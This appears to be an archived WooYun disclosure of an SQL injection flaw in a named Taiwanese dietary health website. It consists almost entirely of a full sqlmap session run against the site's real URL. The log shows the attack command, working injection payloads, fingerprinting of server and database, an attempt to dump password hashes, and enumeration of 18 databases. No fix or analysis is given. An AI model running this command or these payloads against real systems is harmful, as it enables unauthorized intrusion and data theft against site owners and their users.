WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
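2015-03-27: Details have been reported to the vendor; awaiting vendor response.
2015-04-01: The vendor has actively ignored the vulnerability; details are disclosed to the public.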
SQL Injection in a Taiwanese dietary health information website
[root@Hacker~]# Sqlmap Sqlmap sqlmap.py -u "http://www.oyoung.com.tw/about/5qa_content.asp?id=79" --dbs --passwords --current-user --current-db --is-dba
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, sta
[*] starting at 08:35:40
[08:35:40] [INFO] testing connection to the target URL
[08:35:42] [INFO] testing if the target URL is stable. This can take a couple of seconds
[08:35:45] [INFO] target URL is stable
[08:35:45] [INFO] testing if GET parameter 'id' is dynamic
[08:35:46] [INFO] confirming that GET parameter 'id' is dynamic
[08:35:48] [INFO] GET parameter 'id' is dynamic
[08:35:50] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[08:35:50] [INFO] testing for SQL injection on GET parameter 'id'
[08:35:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[08:36:07] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[08:36:31] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'Microsoft SQL Server'
do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1)? [Y/n]
[08:43:44] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[08:43:48] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[08:44:09] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[08:44:11] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[08:44:14] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[08:44:35] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[08:44:37] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[08:44:38] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause'
[08:44:39] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)'
[08:44:48] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
[08:44:48] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)'
[08:44:48] [INFO] testing 'MySQL inline queries'
[08:44:48] [INFO] testing 'PostgreSQL inline queries'
[08:44:48] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[08:44:48] [INFO] testing 'Oracle inline queries'
[08:44:48] [INFO] testing 'SQLite inline queries'
[08:44:48] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[08:44:48] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[08:44:49] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[08:44:52] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[08:44:58] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[08:44:58] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[08:44:59] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[08:45:07] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)'
[08:45:30] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment)'
[08:46:00] [INFO] testing 'Oracle AND time-based blind'
[08:46:01] [INFO] testing 'Microsoft SQL Server/Sybase OR time-based blind (heavy query)'
[08:46:31] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parameter replace'
[08:46:31] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parameter replace (heavy queries)'
[08:46:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[08:46:31] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[08:47:12] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[08:47:13] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range f
[08:47:18] [INFO] target URL appears to have 5 columns in query
[08:47:36] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
[08:47:36] [WARNING] applying generic concatenation with double pipes ('||')
[08:47:36] [WARNING] parameter length constraint mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expected
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 70 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=79' AND 3759=3759 AND 'GkgO'='GkgO

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: id=-2765' UNION ALL SELECT NULL,CHAR(113)+CHAR(121)+CHAR(121)+CHAR(99)+CHAR(113)+CHAR(67)+CHAR(86)+CHAR(81)+CHAR(75)+CHAR(120)+CHAR(117)+CHAR(89)+CHAR(73)+CH
---
[08:53:23] [INFO] testing MySQL
[08:53:24] [WARNING] the back-end DBMS is not MySQL
[08:53:24] [INFO] testing Oracle
[08:53:28] [WARNING] the back-end DBMS is not Oracle
[08:53:28] [INFO] testing PostgreSQL
[08:53:28] [WARNING] the back-end DBMS is not PostgreSQL
[08:53:28] [INFO] testing Microsoft SQL Server
[08:53:29] [INFO] confirming Microsoft SQL Server
[08:53:32] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
[08:53:32] [INFO] fetching current user
[08:53:53] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
current user: 'newoysa'
[08:53:55] [INFO] fetching current database
current database: 'oynewdata2007'
[08:53:55] [INFO] testing if current user is DBA
current user is DBA: False
[08:53:56] [INFO] fetching database users password hashes
[08:54:06] [INFO] the SQL query used returns 2 entries
[08:54:09] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[08:54:09] [INFO] fetching database users
[08:54:10] [INFO] the SQL query used returns 2 entries
[08:54:11] [INFO] fetching number of database users
[08:54:11] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[08:54:11] [INFO] retrieved: 2
[08:54:19] [INFO] retrieved: newoysa
[08:56:15] [INFO] retrieved: sa
[08:56:40] [INFO] fetching number of password hashes for user 'newoysa'
[08:56:40] [INFO] retrieved: 0
[08:56:57] [WARNING] unable to retrieve the number of password hashes for user 'newoysa'
[08:56:57] [INFO] fetching number of password hashes for user 'sa'
[08:56:57] [INFO] retrieved: 0
[08:57:14] [WARNING] unable to retrieve the number of password hashes for user 'sa'
[08:57:14] [ERROR] unable to retrieve the password hashes for the database users (most probably because the session user has no read privileges over the relevant system d
[08:57:14] [INFO] fetching database names
[08:57:14] [INFO] the SQL query used returns 18 entries
[08:57:36] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[08:58:04] [INFO] fetching number of databases
[08:58:04] [INFO] retrieved: 18
[08:58:14] [INFO] retrieved: aspnetdb
[08:59:20] [INFO] retrieved: master
[09:00:01] [INFO] retrieved: model
[09:00:32] [INFO] retrieved: msdb
[09:01:24] [INFO] retrieved: oy_ad
[09:02:16] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
custome
[09:03:14] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
r
[09:03:31] [INFO] retrieved: oy_
[09:04:14] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
ad
[09:04:50] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
po
[09:05:25] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
o
[09:06:15] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
l
[09:06:31] [INFO] retrieved: oy_adpool_cn
[09:07:56] [INFO] retrieved: oy_message
[09:09:25] [INFO] retrieved: oy_message_c
[09:11:11] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
n
[09:11:32] [INFO] retrieved: oyn
[09:12:40] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
ewdata2007
[09:14:27] [INFO] retrieved: red2009
[09:15:27] [INFO] retrieved: red2009_cn
[09:16:38] [INFO] retrieved: Repo
[09:17:27] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
rtSe
[09:18:06] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
rver$OYOUNGWEB
[09:20:14] [INFO] retrieved: ReportServer$OYOUNGWEBTempDB
[09:22:43] [INFO] retrieved: rp3
[09:23:00] [INFO] retrieved: rp7
[09:23:17] [INFO] retrieved: shop2010
[09:24:14] [INFO] retrieved: tempdb
available databases [18]:
[*] aspnetdb
[*] master
[*] model
[*] msdb
[*] oy_adcustomer
[*] oy_adpool
[*] oy_adpool_cn
[*] oy_message
[*] oy_message_cn
[*] oynewdata2007
[*] red2009
[*] red2009_cn
[*] ReportServer$OYOUNGWEB
[*] ReportServer$OYOUNGWEBTempDB
[*] rp3
[*] rp7
[*] shop2010
[*] tempdb
[09:24:53] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 84 times
[09:24:53] [INFO] fetched data logged to text files under 'E:\INJECT~1\SQLMAP~1.4\Bin\output\www.oyoung.com.tw'
Severity: No impact (ignored by vendor)
Ignored at: 2015-04-01 17:04
None yet